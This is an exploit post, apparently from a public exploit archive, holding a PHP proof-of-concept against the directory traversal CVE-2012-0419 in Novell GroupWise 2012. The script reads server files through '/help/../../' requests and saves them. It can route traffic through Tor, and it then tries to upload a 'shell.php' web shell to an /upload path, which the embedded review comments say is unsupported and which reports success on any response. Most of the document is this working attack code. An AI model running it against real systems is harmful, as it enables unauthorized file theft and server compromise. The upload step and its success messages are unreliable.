Novell GroupWise 2012 Traversal / Shell Upload
=============================================================================================================================================
| # Title Novell GroupWise 2012 Traversal / Shell Upload
=============================================================================================================================================
| # Title : Novell GroupWise 2012 before Support Pack 1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.novell.com/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or another search engine.
[+] Code Description: This code uses the directory traversal vulnerability in Novell GroupWise to read files from the server and save them locally, and attempts to upload a web shell payload if possible, making it an effective penetration testing tool.
( https://packetstorm.news/files/id/181042/ CVE-2012-0419 )
[+] save code as poc.php.
[+] Set Target : line 124
[+] Usage : php poc.php
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the directory traversal in the Novell GroupWise
 * agent HTTP interface, which the advisory text around this code identifies as
 * CVE-2012-0419.
 *
 * What the class does, as written:
 *  - fingerprints the service by looking for the string "GroupWise" in the root page;
 *  - requests /help/ followed by repeated "../" segments and a file path, then
 *    saves whatever body comes back into the current working directory;
 *  - separately POSTs a local file as multipart/form-data to /upload.
 *
 * Defender notes:
 *  - All requests are plain HTTP to the agent port (7181 by default here).
 *    Requests under /help/ whose path contains "../" sequences are the
 *    observable signature in agent, proxy or IDS logs.
 *  - The advisory title scopes the issue to GroupWise 2012 before Support Pack 1.
 *    NOTE(review): confirm the fixed version against the vendor bulletin, and
 *    keep the agent HTTP port reachable only from management networks.
 *  - NOTE(review): nothing in this file shows that an /upload endpoint exists
 *    on the agent; the upload step is not evidence of a second vulnerability.
 */
class NovellGroupwiseExploit {
// Host name or IP address of the agent under test.
private $target;
// TCP port of the agent HTTP interface.
private $port;
// Server-side path requested through the traversal.
private $filePath;
// Number of "../" segments placed in front of $filePath.
private $depth;
// Optional proxy handed to cURL (CURLOPT_PROXY).
private $proxy;
// When true, requests are sent through a SOCKS5 proxy at 127.0.0.1:9050.
private $useTor;
// Only printed by exploit(); no OS detection is performed with it.
private $osList = ['Windows', 'Linux', 'MacOS'];
/**
 * Stores the connection and request settings; no validation is performed.
 *
 * @param string      $target   Host name or IP address of the agent.
 * @param int         $port     Agent HTTP port.
 * @param string      $filePath Path to request; a leading "/" is stripped later in exploit().
 * @param int         $depth    Number of "../" segments to prepend.
 * @param string|null $proxy    Proxy for cURL, or null for a direct connection.
 * @param bool        $useTor   Route through the local SOCKS5 proxy instead.
 */
public function __construct($target, $port = 7181, $filePath = '/windows/win.ini', $depth = 10, $proxy = null, $useTor = false) {
$this->target = $target;
$this->port = $port;
$this->filePath = $filePath;
$this->depth = $depth;
$this->proxy = $proxy;
$this->useTor = $useTor;
}
/**
 * Performs one HTTP request with cURL and returns the body.
 *
 * No timeout, status-code check or error reporting is configured, so the
 * caller cannot tell an error page from the requested content.
 *
 * @param string      $url      Full URL to request.
 * @param string|null $postData When truthy, sent as the POST body; the callers
 *                              in this class never pass it.
 * @return string|bool Response body, or false when curl_exec() fails.
 */
private function sendRequest($url, $postData = null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
if ($this->proxy) {
curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
}
// Runs after the proxy branch: when both are set, the SOCKS5 address below
// replaces $this->proxy.
if ($this->useTor) {
curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}
if ($postData) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
/**
 * Fingerprints the service by fetching the root page.
 *
 * This is a substring match only: any response containing "GroupWise" passes,
 * and it says nothing about the product version or patch level.
 *
 * @return bool True when the root page contains the string "GroupWise".
 */
private function isGroupwise() {
$url = "http://{$this->target}:{$this->port}/";
$response = $this->sendRequest($url);
return strpos($response, 'GroupWise') !== false;
}
/**
 * Requests the configured file through the /help/ traversal and saves the response.
 *
 * A "File saved" message does not prove the host is vulnerable: any non-empty
 * body, including an error page, is written to disk.
 *
 * @return void
 */
public function exploit() {
if (!$this->isGroupwise()) {
echo "[!] {$this->target}:{$this->port} - Not a GroupWise Agent HTTP Interface\n";
return;
}
// Prints each list entry; the loop does not probe or select an operating system.
foreach ($this->osList as $os) {
echo "[*] Checking for OS: $os\n";
}
// The request path is /help/ plus $depth "../" segments plus the file path
// without its leading slash. This shape is what log and IDS rules can match.
$traversal = str_repeat("../", $this->depth) . ltrim($this->filePath, '/');
$url = "http://{$this->target}:{$this->port}/help/" . $traversal;
echo "[*] Sending request to $url ...\n";
$response = $this->sendRequest($url);
if ($response) {
// Written to the current working directory under the file's base name.
$fileName = basename($this->filePath);
file_put_contents($fileName, $response);
echo "[+] File saved: $fileName\n";
} else {
echo "[!] Failed to retrieve file\n";
}
}
/**
 * POSTs a local file to /upload on the target as multipart/form-data.
 *
 * NOTE(review): the advisory text describes a directory traversal; this file
 * gives no indication that the agent exposes an /upload handler. The success
 * message is printed for any non-empty response, whatever the HTTP status, so
 * it does not show that anything was stored on the server.
 *
 * @param string $payloadPath Local path of the file to send.
 * @return void
 */
public function uploadPayload($payloadPath) {
$uploadUrl = "http://{$this->target}:{$this->port}/upload";
echo "[*] Attempting to upload payload to $uploadUrl ...\n";
$payload = file_get_contents($payloadPath);
// Truthiness test: an unreadable file and an empty file are both reported as a read failure.
if (!$payload) {
echo "[!] Failed to read payload file\n";
return;
}
// The multipart body is assembled by hand; the boundary is derived from the current time.
$boundary = "----WebKitFormBoundary" . md5(time());
$data = "--$boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"" . basename($payloadPath) . "\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= $payload . "\r\n";
$data .= "--$boundary--\r\n";
$headers = [
"Content-Type: multipart/form-data; boundary=$boundary"
];
// Repeats the cURL setup from sendRequest() in order to add the custom Content-Type header.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $uploadUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
if ($this->proxy) {
curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
}
if ($this->useTor) {
curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}
$result = curl_exec($ch);
curl_close($ch);
// Only checks that some response body came back; the HTTP status is never inspected.
if ($result) {
echo "[+] Payload uploaded successfully!\n";
} else {
echo "[!] Failed to upload payload\n";
}
}
}
// Driver script. The original comments here were mis-encoded and have been
// replaced with English descriptions of the visible code.
$target = '192.168.1.100'; // host under test; the sample value is a private (RFC 1918) address
// Port 7181, file /windows/win.ini, ten "../" segments, traffic sent through a
// local HTTP proxy at 127.0.0.1:8080, SOCKS5 routing disabled.
$exploit = new NovellGroupwiseExploit($target, 7181, '/windows/win.ini', 10, 'http://127.0.0.1:8080', false);
$exploit->exploit();
// Second step: the upload attempt runs whatever the outcome of the read above.
$payloadPath = 'shell.php'; // local path of the file that uploadPayload() sends
$exploit->uploadPayload($payloadPath);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================